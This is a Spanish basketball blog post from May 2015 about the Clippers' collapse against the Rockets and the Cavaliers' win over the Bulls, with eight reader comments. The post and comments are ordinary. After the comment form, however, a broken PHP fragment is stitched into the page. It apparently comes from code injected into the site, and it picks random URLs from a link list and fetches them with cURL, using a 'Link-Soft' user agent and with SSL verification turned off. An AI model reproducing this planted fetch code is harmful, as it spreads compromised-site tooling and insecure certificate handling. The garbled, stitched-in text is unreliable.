La Crónica: Hecatombe

15 de May de 2015 por txusma

Desastre, debacle, catástrofe, tragedia, calamidad, destrozo… Esta vez tenemos palabras más que de sobras para intentar definir lo que les pasó anoche a los Clippers en su propia casa. Con el partido completamente controlado al final del tercer cuarto se dejaron remontar 19 puntos y ¡acabaron perdiendo de 12! Mientras, unos Cavaliers sin Love, sin Varejao, sin Irving a partir del segundo cuarto, con un Lebron humano y con Matheew Dellavedova como mejor hombre se impusieron en el United Center de Chicago y certificaron su pase a la final de conferencia.

Houston Rockets 119 – LA Clippers 107

Una película de terror. Un capítulo más en el libro de los perdedores que encarnan los Clippers y que tantos esfuerzos están haciendo por romper en estos últimos años. Una pesadilla para los aficionados que abarrotaban el Staples Center, para la directiva, para el cuerpo técnico y para todos los jugadores angelinos. Obviemos lo que pasó en el primer y segundo cuarto, nos es completamente igual. La cuestión es que un parcial de 22-6 había puesto a los Clippers 19 puntos arriba a falta de 2 minutos y medio para el final del tercer cuarto. La grada se veía ya en las finales de conferencia pero algo en el cerebro de los jugadores de ambos equipos hizo ‘click’. 9 puntos consecutivos de los Rockets les dejaban a 13 puntos al inicio del último cuarto, período que James Harden iniciaba en el banquillo, para que veáis la confianza que tenían los tejanos en la remontada. El último cuarto fue como una película de ciencia ficción o fantasía. Los Clippers se olvidaron de defender y de repente eran incapaces de meter ni una canasta. En cambio, en el otro lado de la cancha Corey Brewer y Josh Smith (¡¡Corey Brewer y Josh Smith!!) se reencarnaban en Larry Bird y Reggie Miller y anotaban 15 y 14 puntos respectivamente con 5 triples entre los dos. Trevor Ariza y Jason Terry se unían puntualmente a la fiesta y James Harden se lo miraba todo desde el banquillo. El marcador dio la vuelta como un calcetín y los gritos del pabellón se fueron acallando a cada canasta de los ‘Splash Brothers’ versión bizarra. Al final los visitantes ganaron de 12, ¡de 12! Si alguien nos lo explica esta mañana no nos lo creemos, como no se lo quería creer ningún aficionado angelino. 

Los números de esos últimos 12 minutos son demoledores: los Rockets anotaron 40 puntos con un 63% en TC y un 7 de 11 en triples y cogieron 21 rebotes. Los Clippers, en cambio, se quedaron en 15 puntos tras fallar 18 de 22 lanzamientos. Steve Ballmer volvió a llorar pero esta vez no de alegría. Mucho trabajo tendrían que hacer los psicólogos de la organización para recuperar anímicamente a estos jugadores de cara al séptimo partido que se jugará el domingo en el Toyota Center de Houston.

Cleveland Cavaliers 94 – Chicago Bulls 73

Lo de los Bulls no tiene nada que ver con lo que le pasó a los Clippers pero perder en tu propia casa anotando solo 73 puntos ante un equipo sin Love, sin prácticamente Irving y con un Lebron James más bien flojito también podría entrar en los terrenos del terror y las pesadillas. Los Bulls solo plantaron cara en el primer cuarto con Pau Gasol de vuelta y un Derrick Rose bastante entonado. Al principio de empezar el segundo, Kyrie Irving se tuvo que retirar lesionado tras pisar el pie de Tristan Thompson y agravarse se lesión el rodilla izquierda. Lebron James también parecía sufrir molestias en la espalda y se le veía poco acertado. A pesar de todo, los Cavaliers se las ingeniaron para conseguir un parcial de 20-2 de la mano de un Iman Shumpert que se aprovechó de la no-defensa de Mirotic. En el tercer cuarto las cosas siguieron igual de tristes. Lebron apenas anotó un par de canastas pero enfrente solo Jimmy Butler daba señales de vida de manera que la diferencia no se redujo ni un ápice. Y en el último los visitantes se fueron hasta de 27 puntos liderados por Matthew Dellavedova. Los Cavaliers se habían llevado la victoria del United Center muy fácilmente no se sabía muy bien cómo y es que los Bulls anotaron 31 puntos en el primer cuarto y sólo 42 en los 3 cuartos siguientes. ¿Bye, Bye, Thibodeau?

Comenta

8 comentarios a esta entrada

  1. Azabel dice:
    #1

    que decepcionante lo de Bulls, era esta serie o ninguna, si bien le ha faltado Gasol, en su sistema esta baja era considerablemente menos sencible que la de Love, puesto que los Bulls tenian a Gibson y Mirotic, y los Cavs a Thompson y… bueno nadie mas en ese puesto

    Lebron James demostrando nuevamente que nada tiene que envidiarle ni a Jordan ni a Karem ni a Magic, ni a Duncan ni a Chamberlain, se ha jugado esta serie practicamente solo, si logra llegar a la final de la nba con este equipo, simplemente sera epico

      Citar

  2. Ruxixón dice:
    #2

    Enorme los Cavaliers,sin Love y con Irving por piezas,pero con una gran elenco de secundarios,esta noche liderados por Dellavedova,que ha sido una china en el zapato de los Bulls.Ahí ahí andará el australiano en la lista de “Most Wanted” por los aficionados Bulls.Aún con esa actuación,poner en los altares a Shumpert y a Thompson.El primero supliendo la baja a la perfección de JR Smith por sanción,y apropiándose del puesto en el quinteto,sumando en todo lo que puede y en muchos momentos determinante a base de carácter -hoy se ha meado en Mirotic cuando éste le ha vacilado,falta flagrante incluida-.Y Tristan Thompson ganándose la renovación a base de rebotes,saliendo de donde nadie sabe dónde para arrebatar el balón de las manos de los rivales.Rechazó los 13 millones al año ofrecidos por la franquicia,en su momento un disparate de dinero por un jugador así,pero a día de hoy parece una cantidad justa para él -claro,pero la rechazó en su momento,a saber-.En fin,que como seguidor de Cleveland yo ya me conformo con estas finales de conferencia sin que el equipo esté al 100%.

    Por cierto,una vergüenza que hoy jugara Taj Gibson después de lo del otro día.

    Ruxixón: ¿Alguien apuesta a que Houston prolongue la serie hasta el 7º?Porque todo el mundo da por muerta la semi,yo entre ellos.0,0 opciones les doy a los Rockets.

    xDD (para mí consuelo que la mayoría de la gente eran de la misma corriente..tremendo como dejen pasar esta oportunidad los Clippers)

      Citar

  3. Jose Luis dice:
    #3

    La misma vergüenza debería dar que jugase Dellavedova, que es quien coge entre sus pies a Gibson. Si Della no hace eso, Gibson no responde.

    Muy mal los bulls, la verdad es que sí. Perder 2 en tu casa en PO, y este con medio Irving, Lebron tocado… en fin.

    Les falta un anotador exterior de banquillo, entre Brooks y Hinrich suman 1 y así es muy dificil.

      Citar

  4. Ruxixón dice:
    #4

    Venga hombre,ponemos al mismo nivel lo del australiano con la patada de Gibson???Entonces Artest no debería haber chupado una temporada entera de sanción porque medió provocación del aficionado

      Citar

  5. Triceratops dice:
    #5

    Jose Luis:
    La misma vergüenza debería dar que jugase Dellavedova, que es quien coge entre sus pies a Gibson. Si Della no hace eso, Gibson no responde.

    Muy mal los bulls, la verdad es que sí. Perder 2 en tu casa en PO, y este con medio Irving, Lebron tocado… en fin.

    Les falta un anotador exterior de banquillo, entre Brooks y Hinrich suman 1 y así es muy dificil.

    Ahi te han podio los colores Jose Luis…, ni punto de compracion entre lo que hace el de Cavs con el de Bulls.

    Sobre el anotador exterior de banquillo que comentas, Mo Williams es el hombre, creo que es agente libre.

      Citar

  6. Txusma dice:
    #6

    Triceratops: Ahi te han podio los colores Jose Luis…, ni punto de compracion entre lo que hace el de Cavs con el de Bulls.

    Sobre el anotador exterior de banquillo que comentas, Mo Williams es el hombre, creo que es agente libre.

    El problema es que hay q ofrecer el máximo a Jimmy Butler y renovar a Dunleavy. Con eso se ponen por encima del máximo y como los dueños no son muy dados a gastar veremos si quieren ofrecer una mid level por williams. Tal vez es hora de traspasar a Gibson por un exterior y dar minutos a Mirotic.

      Citar

  7. Azabel dice:
    #7

    Txusma: El problema es que hay q ofrecer el máximo a Jimmy Butler y renovar a Dunleavy. Con eso se ponen por encima del máximo y como los dueños no son muy dados a gastar veremos si quieren ofrecer una mid level por williams. Tal vez es hora de traspasar a Gibson por un exterior y dar minutos a Mirotic.

    los Bulls tienen un problema grande y ese es sin duda el super sueldo de Rose, que no juega a excepcion de algunos partidos muy puntuales para ganar ese dinero

    entonces con lo que queda de Rose bastante se las rebuscan, ya perieron a Asik, Korver, Deng y la lista sigue, y han enocntrado algunos jugadores bien pagos como Gasol y Dunleavy, pero donde no funciona capitan (lease Rose) no lo lleva a ningun lado el marinero (lease el resto)

      Citar

  8. Jose Luis dice:
    #8

    Triceratops: Ahi te han podio los colores Jose Luis…, ni punto de compracion entre lo que hace el de Cavs con el de Bulls.

    Sobre el anotador exterior de banquillo que comentas, Mo Williams es el hombre, creo que es agente libre.

    No hay punto de comparación, pero si Dellavedova no le agarra, Gibson no responde.

    Debieron ser expulsados ambos o ninguno. No puede ser que castigues al que responde si no castigas al que empieza. Más aún, Dellavedova no recibió sanción ni tras ver el vídeo.

    Entonces, ¿agarrar a un rival desde el suelo no es sancionable? Pero si el otro responde, si sancionamos al otro.

    Entre esto y lo de la no-técnica… los colores se le han visto a la NBA

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>